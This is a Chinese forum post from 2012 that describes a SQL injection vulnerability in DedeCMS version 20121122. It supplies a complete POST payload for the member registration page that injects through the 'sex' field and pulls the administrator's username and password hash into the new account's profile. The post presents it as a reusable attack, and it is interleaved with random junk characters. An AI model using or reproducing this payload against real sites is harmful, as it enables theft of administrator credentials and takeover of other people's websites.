dedecms版本 20121122: `. ?- v3 w- R+ `) ]% |
' \3 y5 Z1 d7 O. `: f/ l& o$ I
需要magic_quotes_gpc=Off
+ o. W* c9 n2 w: ^7 o% S" w/ U# I$ f( _% G- O/ j5 E$ ^9 p
应该是没有什么大危害的漏洞.
& y' r, L3 H4 m$ d原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.# t( s9 u2 i# {/ w7 l, `* K0 j
7 m: b9 d: n8 k" O N5 K, F3 Y
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.' X6 _8 ~4 e5 d) J$ I5 T$ X
POST提交以下数据,其实不用POST提交的,这样隐蔽点.' F0 F" n% C! K( B
' ]/ S1 x3 k) A, q1 [; c
http:///de/member/reg_new.php
/ f! Z7 p3 |. s1 n4 H5 E" ^) H9 c; h5 n8 D5 t2 x
POST
+ i5 \. U) g$ O9 b" {4 p7 P, a [! e. ^5 ?$ o0 g7 j
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
$ m5 n, F) N4 Y* ?! V0 Q3 q
. Q2 d$ N0 r+ R- \ K成功注册后,头像处里面有好玩的信息.- G: }' e6 M7 c ]: W1 h
# d! l6 p* c" Q! D
|
发表于 2012-12-5 10:03:32
收藏
支持
反对